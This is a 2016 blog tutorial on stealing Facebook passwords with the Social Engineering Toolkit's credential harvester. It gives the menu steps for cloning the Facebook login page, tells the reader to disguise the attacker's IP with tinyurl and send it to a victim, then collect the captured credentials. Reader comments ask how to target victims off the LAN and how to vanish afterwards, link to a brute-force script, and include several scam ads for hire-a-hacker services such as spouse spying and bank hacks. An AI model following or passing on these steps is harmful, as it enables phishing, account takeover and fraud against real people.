Saturday, August 13, 2016

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.




WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.


LET'S DO THIS!!!!!!!!!

Follow this video..........



STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com

    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

*******


More Detailed Guides

If there's something that isn't clear then there's a 3 post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvestor attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extent attack outside your LAN

53 comments:

  1. completed all the steps, not able to get details in harvester file

    ReplyDelete
    Replies
    1. It only works when you are in the Same Local Netwok -.-

      Delete
    2. You should use your external IP and open port 80 on your modem/router for your internal IP.

      Delete
    3. how to send the clone website to my victim

      Delete
    4. How to send the clone website to my victim

      Delete
    5. you only need to send the ip address to the victim

      Delete
  2. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
  3. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
    Replies
    1. your using a usb for your wifi?
      Kali linux doesn't pickup your onboard network card if your using a VM box

      Delete
    2. sudo ifconfig

      Delete
    3. You really shouldn't be using a VM to do network related stuff. Either run a live CD/USB/whatever or install Kali.

      Delete
    4. first of all u have to bridge the virtual box network with lan. then u can check ur ipv4 by typing ip a in terminal. ur ip will be shown as ipnet

      Delete
  4. But this only works for people on the same network, correct?

    ReplyDelete
    Replies
    1. Redirect the 80 port to your machine

      Delete
    2. yes on same network users

      Delete
  5. The url doesn't work for me the next day. Could someone Help me pls

    ReplyDelete
    Replies
    1. Bueno amigo creas una cuenta no-ip y listo tienes el problema resuelto si quieres hacer ataques fuera de la lan

      Delete
  6. How do i stop this (apache etc) after snatching the credentials and want to disappear?

    ReplyDelete
  7. after i did all steps the site cant be reached

    ReplyDelete
  8. It would be great if u make a tutorial on hacking instagram :p.

    ReplyDelete
  9. Article is nice and working for me.for hacking facebook using brute force attack follow below link it may hack every facebook account

    http://www.kalilinuxdojo.com/2015/11/hack-facebook-using-python-script-via-brute-force-attack.html

    ReplyDelete
    Replies
    1. that website is not working can you again help me to download that script plz

      Delete
  10. what's mean "Shorten your ip address with tinyurl.com ". please. explain clearly?

    ReplyDelete
    Replies
    1. Shorten means nothing but hiding your IP behind an URL!

      Delete
    2. how to shorten the ip address explain it

      Delete
  11. How do you use it on people without them being on the same network?

    ReplyDelete
  12. Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
    Replies
    1. tambem estou com esse erro

      Delete
  13. MY IP VERSION IS6 AND TINYURL IS MAKING TROUBLE

    ReplyDelete
  14. getting this error how to fix it- Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
  15. hack into public hot spot then get fb credentials

    ReplyDelete
  16. the website thus created for fishing only works in the same computer from where the process is done.if i send that fishing page to any others mail it doesnt open up. can u help me hacking a persons id who a state away?

    ReplyDelete
  17. How to shorten the IP to tiny URL?pls help me

    ReplyDelete
  18. Hello everyone! If you require the service of a professional hacker to help track your partner's cell phone remotely, contact deadlyhacker01@gmail.com, he helped me hack my husband's phone without physical contact.
    Tell him Stacey referred you, he'd help

    ReplyDelete

  19. Hi, everyone it has come to my knowledge how difficult it is to come across someone so legit for this job, I basically think we don’t need to face any more lies and deceit from our spouse, long time i was fooled around but right now as far as I’m concerned about this job, universalhacker99@gmail.com he’s ] real.
    he saved me from the lies of my cheating fiance, he deals on any type of hack such as gmail, Facebook, whatsapp, mobile phone, Skype, websites, upgrading scores, database, software testing, password sniffing, Cpanels, mystery shopper, SQL DB penetration, lease penetration and lots more, Mail him if you got any issue, he would definitely get it done with the quickest time frame.

    ReplyDelete
  20. This method wont work against HTTPS, exmple chrome user, it will always HTTPS and there will be a notice if it is not safe.

    ReplyDelete
  21. It only work in same network connection can't access external users

    ReplyDelete
  22. please tell me how to reset this attack

    ReplyDelete
  23. hi,
    I get this error
    "[!] Something went wrong, printing the error: zipimporter() argument 1 must be string, not function"

    can anyone please help.

    thanks

    ReplyDelete
  24. the clone webpage comes in my regional language (hindi) when I or anyone visit the clone webpage. It looks like a fake page, what should i do to make it in english

    ReplyDelete
  25. hey i have a doubt not related to this .I am using kali linux and sometime i cant access any website but i can access fb,google.youtube .Terminal cant install any app it show connecting to kali.org then it stops.plz help!!

    ReplyDelete
  26. I need your help bro'' Please Help me''
    will you help me?
    don't refuse''

    ReplyDelete
  27. fuck you this work in the network but i find what work in any accont

    ReplyDelete
  28. this works for same network within same LAN, so how it works for external network?

    ReplyDelete
  29. Does this clone work on other websites

    ReplyDelete
  30. How do you get this files. Where i get from??
    6. Go to Places > Computer > VAR > WWW and move all the files from www folder to html folder.

    7. Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW.

    ReplyDelete
  31. Need a certified hacker? Contact me on blackmagicdhacker@gmail.com. Guaranteed results.

    ReplyDelete
  32. I was in a state of dilemma when i suspected my ex wife of cheating on me. I knew something was going on but i had to evidence against her. I felt like a looser until a colleague of mine introduced me to one of the best chinese hackers by the name Chong Deming. This genius cloned my ex wifes phone and i was able to have access to her facebook,whatsapp and emails without even touching her cell phone. You should contact Chong Deming for any hacking services.

    Email- demingwebhack@gmail.com, WhatsApp- +380683017209

    He also offers services such as:
    -Website hack
    -Changing school grades without leaving traces
    -Clearing criminal records without leaving traces
    -Bank account hack/funds transfer
    -Phone cloning
    -call tracking

    ReplyDelete
  33. PEOPLE ARE GETTING IN CONTACT WITH HACKERS TO HELP THEM EXPUNGE CRIMINAL RECORDS,ALL FORM OF UNIVERSITY UP GRADES,PREDICT THE STOCK MARKETS,CLEAR STUDENT LOANS AND OTHER DEBTS.FIX CREDIT RATING DOUBLE YOUR TAX RETURNS AND HACK BUSINESS COMPETITORS.HACK BANK ACCOUNTS,ALL FORM OF EMAILS AND WEBSITES,SPY ON CHEATING SPOUSE,MOBILE PHONES AND ALL FORM OF SOCIAL MEDIA HACKS:INSTAGRAM,SNAPCHAT,TWITTER ETC, TRACKING DEVICE HACK.CONTACT: hackempire007@gmail.com

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC